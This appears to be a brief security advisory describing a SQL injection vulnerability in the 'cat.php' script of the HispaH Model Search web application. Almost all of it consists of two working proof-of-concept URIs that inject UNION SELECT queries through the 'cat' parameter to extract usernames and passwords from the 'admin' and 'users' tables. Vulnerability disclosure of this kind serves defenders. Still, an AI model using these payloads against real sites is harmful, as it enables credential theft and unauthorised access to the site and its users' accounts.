HispaH Model Search 'cat.php' SQL Injection Vulnerability

HispaH Model Search 'cat.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
http://www.example.com/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*